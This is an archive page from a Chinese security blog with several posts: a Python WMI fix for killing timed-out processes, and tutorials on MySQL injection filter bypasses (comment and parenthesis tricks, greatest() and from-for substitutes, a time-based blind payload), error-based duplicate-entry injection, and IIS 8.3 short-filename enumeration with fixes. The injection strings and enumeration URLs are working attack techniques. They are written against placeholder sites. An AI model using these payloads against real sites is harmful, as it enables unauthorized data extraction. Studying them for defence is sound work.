2014 | 李劼杰的博客

python在子线程中使用WMI报错-2147221020

我在一个python脚本中用到了WMI，用于确保杀死超时却未能自己结束的进程 (已经先尝试了Ctrl+Break中止)。

测试代码运行正常，但当我把这个函数放在子线程中使用时，却发现报错：

com_error: (-2147221020, ‘Invalid syntax’, None, None)

后来在网上检索，发现必须添加初始化函数和去初始化函数，所以在一个子线程中可使用的函数代码类似于：

import win32com.client
import pythoncom
import subprocess
import logging

def task_kill_timeout(timeout):
    pythoncom.CoInitialize()
    WMI = win32com.client.GetObject('winmgmts:')
    all_process = WMI.ExecQuery('SELECT * FROM Win32_Process where Name="aaa.exe" or Name="bbb.exe" or Name="ccc.exe"')
    for process in all_process:
        t = process.CreationDate
        t = t[:t.find('.')]
        start_time = time.strptime(str(t), '%Y%m%d%H%M%S' )
        time_passed_by = time.time() - time.mktime(start_time)
        if time_passed_by > timeout:
            logging.error( 'Run taskkill %s' % process.name)
            print 'Run taskkill %s' % process.name
            subprocess.Popen('taskkill /F /pid %s' % process.processid,
                             stderr=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             )
            time.sleep(1.0)
    pythoncom.CoUninitialize ()

一旦上述aaa.exe，bbb.exe，ccc.exe进程运行超过timeout秒，即会被强制结束。

参考链接：

http://bytes.com/topic/python/answers/608938-importing-wmi-child-thread-throws-error

批量查询站点PR和排名的Python脚本

几行代码，去chinaz查询一个网站的Google PR，Sogou PR，百度Rank，Alexa排名信息。

主要还是用来找高权重网站的。。。

无法保证一直可用，正则匹配的。

获取源代码：

https://github.com/lijiejie/website_rank

MySQL注射的过滤绕过技巧[2]

前文介绍了MySQL注射绕过大小于符号，绕过逗号的一点小技巧。

本篇继续介绍在空格被过滤的情况下如何注入。

SQL注入时，空格的使用是非常普遍的。比如，我们使用union来取得目标数据：

http://www.xxx.com/index.php?id=1 and 0 union select null,null,null

上面的语句，在and两侧、union两侧、select的两侧，都需要空格。

1. 注释绕过空格

这是最基本的方法，在一些自动化SQL注射工具中，使用也十分普遍。在MySQL中，用

/*注释*/

来标记注释的内容。比如SQL查询：

select user() from dual

我们用注释替换空格，就可以变成：

select/**/user()/**/from/**/dual

如下图，SQL命令能够正确执行：

2. 括号绕过空格

空格被过滤，但括号没有被过滤，可通过括号绕过。

我的经验是，在MySQL中，括号是用来包围子查询的。因此，任何可以计算出结果的语句，都可以用括号包围起来。而括号的两端，可以没有多余的空格。

括号绕过空格的方法，在time based盲注中，是屡试不爽的。

举例说明，我们有这样的一条SQL查询：

select user() from dual where 1=1 and 2=2

如何把空格减到最少？

观察到user()可以算值，那么user()两边要加括号，变成：

select(user())from dual where 1=1 and 2=2;

继续，1=1和2=2可以算值，也加括号，去空格，变成：

select(user())from dual where(1=1)and(2=2)

dual两边的空格，通常是由程序员自己添加，我们一般无法控制。所以上面就是空格最少的结果。

这也是非常实用的一个技巧。

这两篇介绍了一些基础的内容，用我常用的一条time based盲注语句做个总结：

http://www.xxx.com/index.php?id=(sleep(ascii(mid(user()from(2)for(1)))=109))

这条语句是猜解user()第二个字符的ascii码是不是109，若是109，则页面加载将延迟。它：

1) 既没有用到逗号、大小于符号

2) 也没有使用空格

却可以完成数据的猜解工作！

IIS短文件名暴力猜解漏洞分析

昨天写了个“IIS短文件名暴力猜解漏洞”的利用脚本（比网上传播的那个Java POC能猜解出更多文件和文件夹）。在此，把漏洞做个简单的分析和总计。

1. 漏洞的成因

为了兼容16位MS-DOS程序，Windows为文件名较长的文件（和文件夹）生成了对应的windows 8.3 短文件名。

在Windows下查看对应的短文件名，可以使用命令dir /x。

比如，我在D盘下创建了一个名为aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.html文件：

D:\>dir /x
 驱动器 D 中的卷是 Data
 卷的序列号是 3EDF-2E00

 D:\ 的目录

2014/10/11  13:08       256,515,706              2014101.sql
2014/10/13  17:01                 0 AAAAAA~1.HTM aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
.html
               2 个文件    256,515,706 字节
               0 个目录 107,017,154,560 可用字节

观察命令结果，可以看到，其对应的短文件名 AAAAAA~1.HTM。该短文件名有以下特征：

只有前六位字符直接显示，后续字符用~1指代。其中数字1还可以递增，如果存在多个文件名类似的文件（名称前6位必须相同，且后缀名前3位必须相同）。
后缀名最长只有3位，多余的被截断。

我们可以在启用.net的IIS下暴力列举短文件名，原因是：

访问构造的某个存在的短文件名，会返回404
访问构造的某个不存在的短文件名，会返回400

2. 漏洞的利用

漏洞的利用，需要使用到通配符*。在windows中，*可以匹配n个字符，n可以为0. 判断某站点是否存在IIS短文件名暴力破解，构造payload，分别访问如下两个URL:

1. http://www.target.com/*~1****/a.aspx

2. http://www.target.com/l1j1e*~1****/a.aspx

404

400

这里我使用了4个星号，主要是为了程序自动化猜解，逐个猜解后缀名中的3个字符，实际上，一个星号与4个星号没有任何区别（上面已经提到，*号可以匹配空）。

如果访问第一个URL，返回404。

而访问第二个URL，返回400。则目标站点存在漏洞。

判断漏洞存在后，继续猜解目录下是否存在一个a开头的文件或文件夹，访问：

http://www.target.com/a*~1****/a.aspx

如果存在，将返回404。如此反复，不断向下猜解完所有的6个字符。

猜解完之后，得到的序列应该类似：

http://www.target.com/abcdef*~1****/a.aspx

到了这一步，需要考虑两种情况，如果以abcdef开头的是一个文件夹，则

http://www.target.com/abcdef*~1/a.aspx

将返回404.

如果abcdef开头的是一个文件，则自动提交

http://www.target.com/abcdef*~1*g**/a.aspx

用a-z的26个字母替换上述g的位置，应该能得到多个404页面。（记住一点，404代表的是存在。）如果下面的地址返回404，

http://www.target.com/abcde*~1*g**/a.aspx

则代表扩展名中肯定存在g。

按照上面的思路，继续猜解g后面的字符，直到后缀名中的3个字符都猜解完，就可以了。

以上介绍了怎么手工猜解，这个漏洞的意义何在：

猜解后台地址
猜解敏感文件，例如备份的rar、zip、.bak、.SQL文件等。
在某些情形下，甚至可以通过短文件名web直接下载对应的文件。比如下载备份SQL文件。

3.漏洞的局限性

这个漏洞的局限有几点：

1) 只能猜解前六位，以及扩展名的前3位。

2) 名称较短的文件是没有相应的短文件名的。

3）需要IIS和.net两个条件都满足。

4. 漏洞的修复

1) 升级.net framework

2) 修改注册表键值：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem

修改NtfsDisable8dot3NameCreation为1。

3) 将web文件夹的内容拷贝到另一个位置，比如D:\www到D:\www.back，然后删除原文件夹D:\www，再重命名D:\www.back到D:\www

如果不重新复制，已经存在的短文件名则是不会消失的。

本文参考链接：

http://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/

http://www.freebuf.com/articles/4908.html

http://support2.microsoft.com/kb/121007

MySQL注射的过滤绕过技巧[1]

SQL注射的绕过技巧较多，此文仅做一些简单的总结。

前文已经提到，最好利用的注射点：

支持Union
可报错
支持多行执行、可执行系统命令、可HTTP Request等额外有利条件

若非以上类型，则可能需要暴力猜解。猜解时，可能会遇到一些限制。攻击者要做的，就是将其个个击破。

1. 通过greatest函数绕过不能使用大小于符号的情况

猜解单个字符时，通常使用折半查找。

mysql> select ascii(mid(user(),1,1)) < 150;
+------------------------------+
| ascii(mid(user(),1,1)) < 150 |
+------------------------------+
|                            1 |
+------------------------------+

以上是判断user()第一个字符的ascii码是否小于150. 若小于150，返回true(1)，否则返回false(0)。可以看到，需要使用到大小于符号。

比如，对于一个boolean based注入。尝试：

http://xxx.com/index.php?id=1 and ascii(mid(user(),1,1)) < 150

http://xxx.com/index.php?id=1 and ascii(mid(user(),1,1)) >= 150

上述两个页面返回的内容应该是不同的。

但问题是，有些情形下，我们是不能使用大小于符号的(<>)，被过滤了。

此时，可以通过greatest函数绕过。greatest(a,b)，返回a和b中较大的那个数。

当我们要猜解user()第一个字符的ascii码是否小于等于150时，可使用：

mysql> select greatest(ascii(mid(user(),1,1)),150)=150;
+------------------------------------------+
| greatest(ascii(mid(user(),1,1)),150)=150 |
+------------------------------------------+
|                                        1 |
+------------------------------------------+

如果小于150，则上述返回值为True。

2. 通过substr函数绕过不能使用逗号的情况

不能使用逗号的情况较少，往往是因为逗号有某些特殊的作用，被单独处理了。

通常，猜解都是要用到逗号的，因为需要mid函数取字符呐：

ascii(mid(user(),1,1))=150

绕过的方法是使用from x for y。语法类似：

mid(user() from 1 for 1)
或
substr(user() from 1 for 1)

以上同样是从第一个字符开始，取一位字符。

那么，不带逗号注入的语法，就可以变成：

mysql> select ascii(substr(user() from 1 for 1)) < 150;
+------------------------------------------+
| ascii(substr(user() from 1 for 1)) < 150 |
+------------------------------------------+
|                                        1 |
+------------------------------------------+

是不是跟mid函数的效果是一样的，又没有用到逗号。

经典的MySQL Duplicate entry报错注入

SQL注射取数据的方式有多种：

利用union select查询直接在页面上返回数据，这种最为常见，一个前提是攻击者能够构造闭合的查询。
Oracle中利用监听UTL_HTTP.request发起的HTTP请求，把QuerySet反弹回攻击者的主机。当然，HTTP服务器对URL的长度有一定限制，因此每次可返回的数据量不可过多。
基于错误消息取数据，前提是页面能够响应详细的错误描述。它的一个优点是，我们可能不必太费力去猜测和闭合SQL(可以构造子查询，让MySQL在子查询中报错)。
盲注，页面不会显示错误消息。常见基于布尔的盲注、基于时间的盲注，此类注射点利用价值相对要低一点，猜解数据的时间较长。

本篇简单说明非常经典的基于错误回显的MySQL注射。最重要的，就是理解下面的SQL查询：

select count(*),floor(rand(0)*2)x from information_schema.character_sets group by x;

上面的这条SQL将报错: Duplicate entry ‘1’ for key ‘group_key’

如下图

1. 为什么MySQL注射要用information_schema库？

答案是这个库是MySQL自带的，安装之后就创建好了，所有账号都有权限访问。攻击者无需猜解库名、表名。跟Oracle注射使用dual类似。

2. 如何利用报错取数据？

利用报错，攻击者把目标数据concat连接到floor()函数的前后即可。

例如，下面的语句用于获取MySQL Server版本，构造：

mysql> select count(*),concat( floor(rand(0)*2), 0x5e5e5e, version(), 0x5e5e5e) x from information_schema.character_sets
group by x;
ERROR 1062 (23000): Duplicate entry ‘1^^^5.5.28^^^’ for key ‘group_key’

通过报错，即可知道当前数据库是5.5.28。0x5e5e5e是3个尖括号的16进制表示。自动化SQL注射工具通常会在目标数据前后做类似的标记，方便程序提取。

加上标记，也可以方便攻击者在大的页面中搜索。

3. 为何这条语句会报错?

rand(0)是把0作为生成随机数的种子。首先明确一点，无论查询多少次，无论在哪台MySQL Server上查询，连续rand(0)生成的序列是固定的。

mysql> select rand(0)*2 x from information_schema.character_sets;
+---------------------+
| x                   |
+---------------------+
|  0.3104408553898715 |
|   1.241763483026776 |
|  1.2774949104315554 |
|  0.6621841645447389 |
|  1.4784361528963188 |
|  1.4056283323146668 |
|  0.5928332643516672 |
|  0.7472813862816258 |
|  1.9579071998204172 |
|  1.5476919017244986 |
|  1.8647379706285316 |
|  0.6806142094364522 |
|  1.8088571967639562 |
|   1.002443416977714 |
|  1.5856455560639924 |
|  0.9208975908541098 |
|  1.8475513475458616 |
|  0.4750640266342685 |
|  0.8326661520010477 |
|  0.7381387415697228 |
|   1.192695313312761 |
|   1.749060403321926 |
|   1.167216138138637 |
|  0.5888995421946975 |
|  1.4428493580248667 |
|  1.4475482250075304 |
|  0.9091931124303426 |
| 0.20332094859641134 |
| 0.28902546715831895 |
|  0.8351645514696506 |
|  1.3087464173405863 |
| 0.03823849376126984 |
|  0.2649532782518801 |
|   1.210050971442881 |
|  1.2553950839260548 |
|  0.6468225667689206 |
|  1.4679276435337287 |
|  1.3991705788291717 |
|  0.5920700250119623 |
+---------------------+

应用floor函数（取浮点数的整数部分）后，结果变成了：

mysql> select floor(rand(0)*2) x from information_schema.character_sets;
+---+
| x |
+---+
| 0 |
| 1 |
| 1 |
| 0 |
| 1 |
| 1 |
| 0 |
| 0 |
| 1 |
| 1 |
| 1 |
| 0 |
| 1 |
| 1 |
| 1 |
| 0 |
| 1 |
| 0 |
| 0 |
| 0 |
| 1 |
| 1 |
| 1 |
| 0 |
| 1 |
| 1 |
| 0 |
| 0 |
| 0 |
| 0 |
| 1 |
| 0 |
| 0 |
| 1 |
| 1 |
| 0 |
| 1 |
| 1 |
| 0 |
+---+
39 rows in set (0.00 sec)

可以看到，第二行和第三行的值都是1。这也是最终引起MySQL报错Duplicate entry的地方。

实际上，我们分开执行下面的两种查询，都是不会出错的：

a) select floor(rand(0)*2) x from information_schema.character_sets group by x;

上面的查询根据x列的值进行分组，得到：

+---+
| x |
+---+
| 0 |
| 1 |
+---+

b) select count(*), floor(rand(0)*2) x from information_schema.character_sets;

得到information_schema.character_sets总共有39行：

+----------+---+
| count(*) | x |
+----------+---+
|       39 | 0 |
+----------+---+
1 row in set (0.00 sec)

请注意，这里x的值出现的是0。

c) 将上述语句结合后即报错

select count(*), floor(rand(0)*2) x from information_schema.character_sets group by x;

我们预期的结果，其实是:

+----------+---+
| count(*) | x |
+----------+---+
|       18 | 0 |
+----------+---+
|       11 | 1 |
+----------+---+
2 row in set (0.00 sec)

然而MySQL在内部处理中间结果的时候，出现了意外，导致报错。

参考链接： SQL Injection attack – What does this do?